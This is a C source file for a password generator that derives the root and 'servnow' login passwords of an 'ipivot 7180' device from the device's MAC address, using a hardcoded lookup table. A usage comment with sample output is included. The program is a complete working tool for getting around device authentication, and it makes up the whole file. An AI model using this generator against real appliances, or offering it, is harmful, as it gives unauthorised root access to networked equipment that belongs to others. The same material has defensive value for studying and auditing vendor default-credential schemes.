/* ip7180gen.c -- ipivot 7180 root/servnow password generator
 * passwords are based solely on MAC address of interface 0.
 *
 * > gcc -o ip7180gen ip7180gen.c -O2 
 * >
 * > ip7180gen root 01:23:45:67:89:ab
 * > ALF7bmjaV
 * >
 * > ip7180gen servnow 01:23:45:67:89:ab
 * > aNch4h9iMU
 *
 */

#include<stdio.h>

char monkey_data[256]={
	0xFB,0xCB,0xC5,0xF0,0x92,0xE2,0xC9,0xE3,
	0xE2,0xFC,0xE9,0xFE,0xEB,0xE1,0xC7,0xF2,
	0xFE,0x99,0xC2,0xEE,0xC7,0xDE,0xE0,0xD9,
	0x9D,0xDB,0xC7,0xDB,0xD8,0xF0,0x99,0xC4,
	0x9E,0xDC,0x9F,0x9B,0xCB,0xC3,0xDF,0xE6,
	0xE8,0xFC,0xDC,0xC0,0xEB,0xE2,0xC8,0x99,
	0xD8,0xC8,0xE5,0xC8,0xC2,0xCE,0xD0,0xEC,
	0xE5,0x9D,0xC1,0xD3,0xE5,0xEC,0xEE,0xDF,
	0xF8,0xD8,0xF2,0xC2,0xD3,0xDF,0xFD,0xC7,
	0xC9,0xC5,0xDA,0xCB,0xE6,0x93,0xEC,0x9B,
	0xF8,0x9F,0xE5,0xC2,0x9F,0xCC,0xF8,0xCB,
	0xE2,0xE7,0xE5,0xD2,0xC7,0x99,0xEC,0xEE,
	0xE0,0xE2,0x9A,0xC7,0xE5,0xF0,0xCD,0xE8,
	0xCD,0xC9,0xC7,0xF9,0xE4,0x9B,0xE3,0xC7,
	0xCE,0xC9,0x93,0x92,0xE4,0xE5,0xC4,0x99,
	0xE5,0xFB,0xEE,0xCC,0xE4,0xC1,0x98,0xFF,
	0xE4,0xF9,0xDF,0xEB,0x9D,0xC5,0xC4,0xE3,
	0xFD,0xED,0xEE,0x98,0xFF,0xE2,0xDE,0xCE,
	0xD8,0xC7,0xD9,0xC3,0xE6,0xE5,0x9A,0x9F,
	0xCC,0x9E,0x98,0x9A,0xE4,0x9E,0x9B,0xEC,
	0xC0,0xDF,0xC0,0xEC,0xFB,0xE6,0xE1,0xDA,
	0xFE,0xE1,0xF8,0xC3,0xFB,0xDA,0xC0,0xCB,
	0xE5,0xC7,0xEB,0x93,0xDF,0xE8,0xC3,0xE2,
	0xC3,0xF0,0xE3,0xDC,0xC7,0xDB,0xF0,0xD8,
	0xE2,0xD8,0x9D,0xF3,0xD9,0xE4,0xED,0xDE,
	0xDF,0xDC,0xF8,0xC6,0x9B,0x9D,0xC8,0xC4,
	0xCE,0xD9,0xEE,0xE2,0xEB,0xCB,0xE3,0xD9,
	0xE9,0xE7,0xC0,0xDD,0x9F,0xCC,0xF0,0xC3,
	0xF8,0x99,0xF8,0xEE,0x9B,0xC0,0x92,0x9B,
	0xF8,0xC8,0xC4,0xEE,0xC8,0xFA,0xDC,0xD0,
	0x93,0xEB,0xFC,0xD9,0xE1,0xCD,0xEF,0xC2,
	0xCD,0xCC,0xDE,0x9D,0xDA,0xE1,0xE0,0x9F
};

void do_monkey(unsigned char *name, unsigned char *macaddr)
{
  unsigned char *mch,c,d;
  int b=0,e=0;
  unsigned char buf[12],revbuf[12],*rbuf;
  unsigned char outbuf[12];
  memset(outbuf,0,12);

  // Strip out colons and concatenate significant digits into 12 digit buffer
  for(mch=macaddr;(*mch)!='\0';mch++) { 
    c=*mch;
    if(c=='0') {
      if(e==0) {
	continue;
      }
    }
    if(c!=':') {
      e++;
      buf[b++]=c;
      if(b>12) {
	printf("BAH!\n");
	return;
      }
    }
  }
  
  // Reverse mac address bytes and add null terminator
  b--;
  e=0;
  while(b>=0) {
    revbuf[e]=buf[b];
    b--;
    e++;
  }
  revbuf[e]='\0';

  b=0;
  d=0;
  rbuf=revbuf;
  do {
    c=*rbuf;
    if(c==0) {
      c=*name;
      if(c!=0)
	goto notzero;
      if(b>7)
	break;
      else
	goto lessthanseven;
    }

    d+=c;
    rbuf++;
    c=*name;
    if(c!=0) {
notzero:;
      d+=c;
      name++;
    }
    outbuf[b]=monkey_data[(unsigned char)d]^0xAA;
lessthanseven:;
    outbuf[b]=monkey_data[(unsigned char)(d+b)]^0xAA;
    b++;
  } while(b<=12);

  outbuf[b-1]='\0';

  printf("%s\n",outbuf);
  fflush(stdout);
}



int main(int argc, char **argv)
{

  if(argc!=3) {
    printf("usage: ip7180gen <user> <mac addr>\n");
    return 0;
  }

  do_monkey(argv[1],argv[2]);

  return 0;
}

